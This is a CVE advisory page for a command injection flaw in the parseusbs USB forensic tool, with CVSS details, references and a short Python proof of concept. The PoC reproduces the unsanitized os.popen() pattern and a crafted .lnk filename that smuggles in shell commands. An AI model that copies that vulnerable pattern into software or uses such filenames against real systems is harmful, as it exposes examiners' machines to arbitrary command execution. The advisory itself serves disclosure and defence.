Security Vulnerability Report
CVE-2026-40029 CVSS 7.8 HIGH

CVE-2026-40029

Published: 2026-04-08 22:16:23
Last Modified: 2026-04-13 20:27:50

Description

parseusbs before 1.9 contains an OS command injection vulnerability in parseUSBs.py where LNK file paths are passed unsanitized into an os.popen() shell command, allowing arbitrary command execution via crafted .lnk filenames containing shell metacharacters. An attacker can craft a .lnk filename with embedded shell metacharacters that execute arbitrary commands on the forensic examiner's machine during USB artifact parsing.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:khyrenz:parseusbs:*:*:*:*:*:*:*:* - VULNERABLE
parseusbs < 1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-40029: parseusbs OS Command Injection
# This PoC demonstrates the vulnerability concept where a malicious filename
# containing shell metacharacters is passed to os.popen().
import os

# Simulating the vulnerable function in parseUSBs.py
def vulnerable_parsing_function(filepath):
    # The vulnerability lies here: os.popen executes the string in a shell
    # without sanitizing the input 'filepath'.
    command_output = os.popen(f"type {filepath}")  # Example command
    return command_output.read()

# 1. Attacker creates a malicious file name
# The filename includes a semicolon to chain commands and a comment character
malicious_filename = "innocent.lnk; whoami; echo 'CVE-2026-40029 Exploited'; #"
print(f"[+] Attempting to parse file with name: {malicious_filename}")

# 2. The forensic analyst runs the tool on the untrusted input
try:
    # WARNING: Executing this on a vulnerable system would run 'whoami'
    print("[!] If this were run on the vulnerable software, arbitrary code execution would occur.")
    # result = vulnerable_parsing_function(malicious_filename)
    # print(result)
except Exception as e:
    print(f"Error: {e}")

Weakness
CWE-78 (Improper Neutralization of Special Elements used in an OS Command)

CVSS 4.0 Vector (secondary)
8.5 HIGH
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

References

https://github.com/khyrenz/parseusbs/commit/99f05996494e7e41ea0c7e13145ba20eb793e46b - Patch
https://github.com/khyrenz/parseusbs/pull/10 - Issue Tracking
https://mobasi.ai/sentinel - Third Party Advisory
https://www.vulncheck.com/advisories/parseusbs-command-injection-via-crafted-lnk-filename - Third Party Advisory